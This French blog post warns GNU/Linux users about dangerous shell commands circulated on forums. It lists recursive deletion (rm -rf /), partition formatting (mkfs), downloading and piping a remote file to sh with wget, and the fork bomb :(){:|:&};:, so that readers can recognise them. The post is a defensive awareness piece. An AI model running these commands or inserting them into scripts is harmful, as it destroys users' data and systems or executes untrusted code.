Speak English? Click here to read my English blog!

Connaitre les commandes dangereuses et s’en protéger

Posté par jbj le 8 déc 2007 dans GNU/LinuxPas de commentaires

Depuis quelques mois, on voit de plus en plus, principalement sur des forums mais aussi sur des réseaux p2p, des scripts shells et des lignes de commandes possedant une ou plusieurs instructions dans le but délibéré de nuire à l’utilisateur. Voici une petite liste non exhaustive de commandes dont les utilisateurs de GNU/Linux devraient connaitre afin de s’en protéger.

Les commandes citées ici ne sont pas destinées à être utilisés –ni même testées – sur votre machine et encore moins sur celle d’un tiers. Malheureusement, face à l’engouement pour les systèmes Linux, des utilisateurs mal intentionnés proposent parfois ce genre de commandes, seules ou “cachées” dans des scripts shells.

Elémentaire mais toujours bon à rappeller: Ne jamais utiliser le compte root ou la commande sudo pour des opérations courantes.

Les commandes de suppression de fichier

Sous GNU/Linux, c’est la commande rm qui est utilisée pour supprimmer un ou plusieurs fichiers. Les commandes suivantes sont à proscrire:

rm -rf /

Supprime récursivement tous les fichiers à la racine du disque.

rm -rf

Supprime récursivement tous les fichiers à l’emplacement courant.

rm -r .*

Supprime tous les fichiers cachés (commencant par un point) du répertoire courant.

Les commande de formatage

Les commandes suivantes auront un effet désastreux sur votre système: La partition sera effacée et remplacée par un système de fichier vierge.

mkfs
mkfs.ext3
mkfs.anything

Téléchargement et execution de code malicieux

La commande wget est très utilisée dans les scripts shell: Elle permet de télécharger un fichier via la ligne de commande. Seulement, rien ne dit que le fichier en question ne contient pas d’instructions dangereuses pour le système.
Ces commandes sont à bannir, exepté si le fichier téléchargé est connu:

wget http://some_place/some_file
sh ./some_file
wget http://some_place/some_file -O- | sh

Forkbombs

Le principe est simple: Executer un nombre gigantesque de processus jusqu’au plantage du système. Vous devrez alors rédémarrer en perdant vos modifications, et malheureusement, parfois en ayant des soucis lors du redémarrage.
La commande suivante est assez difficile à déceler dans un code, du à sa syntaxe peu commune:

:(){:|:&};:
Si vous avez aimé cet article, aidez-moi à le promouvoir en votant pour lui sur les sites suivants: Ces icones representent les sites de bookmarking social dans lesquels vos lecteurs peuvent partager et faire découvrir vos pages.
  • del.icio.us
  • Scoopeo
  • Tapemoi
  • Technorati
  • Tutmarks
  • Pioche
  • Blogasty
  • Diggons
  • Wikio
Tags:

Commenter